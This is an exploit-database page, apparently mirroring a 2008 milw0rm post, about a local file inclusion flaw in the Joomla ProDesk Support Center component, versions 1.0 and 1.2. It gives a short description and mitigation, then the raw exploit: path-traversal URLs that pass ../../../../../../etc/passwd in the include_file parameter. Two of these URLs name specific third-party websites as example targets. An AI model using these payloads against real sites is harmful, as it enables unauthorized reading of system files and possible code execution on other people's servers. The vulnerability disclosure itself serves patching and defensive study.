header-logo
Suggest Exploit
vendor:
ProDesk Support Center
by:
d3v1l [Avram Marius]
7.5
CVSS
HIGH
Local File Inclusion
98
CWE
Product Name: ProDesk Support Center
Affected Version From: 1
Affected Version To: 1.2
Patch Exists: YES
Related CWE: N/A
CPE: a:joomlashowroom:pro_desk_support_center
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Joomla Component ProDesk v 1.0 AND 1.2 (com_pro_desk&include_file) Local File Inclusion Vulnerability

Joomla Component ProDesk versions 1.0 and 1.2 are vulnerable to a local file inclusion vulnerability. An attacker can exploit this vulnerability by sending a crafted HTTP request with a malicious 'include_file' parameter to the vulnerable application. This can allow an attacker to include arbitrary files from the web server, which can lead to remote code execution.

Mitigation:

Upgrade to the latest version of Joomla Component ProDesk.
Source

Exploit-DB raw data:

[~]-------------------------------------------------------------------------------------------------------
[~] Joomla Component ProDesk v 1.0 AND 1.2 (com_pro_desk&include_file) Local File Inclusion Vulnerability
[~]
[~] http://joomlashowroom.com/index.php/Pro-Desk-Support-Center/Pro-Desk-Support-Center.html
[~]  
[~] 
[~] ----------------------------------------------------------------------------------------------------
[~] Bug founded by d3v1l [Avram Marius]
[~]
[~] Date: 4.11.2008
[~]
[~]
[~] d3v1l@spoofer.com http://security-sh3ll.com
[~]
[~] -----------------------------------------------------------------------------------------------------
[~] Greetz tO ALL:-
[~]
[~] Security-Shell Members ( http://security-sh3ll.com/forum.php )
[~]
[~] milw0rm staff
[~]------------------------------------------------------------------------------------------------------
[~] Exploit :-
[~]
[~] http://site.com/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd
[~]  
[~] Ex :- v 1.2
[~]
[~] http://www.reviewyou.com.au/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd
[~]-------------------------------------------------------------------------------------------------------
[~] 
[~] Ex :- v1.0 
[~]  
[~] http://www.ppcmanagement.com/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd 
[~]---------------------------------------------------------------------------------------------------------

# milw0rm.com [2008-11-04]

Navigation

Suggest Exploit

Services By CQR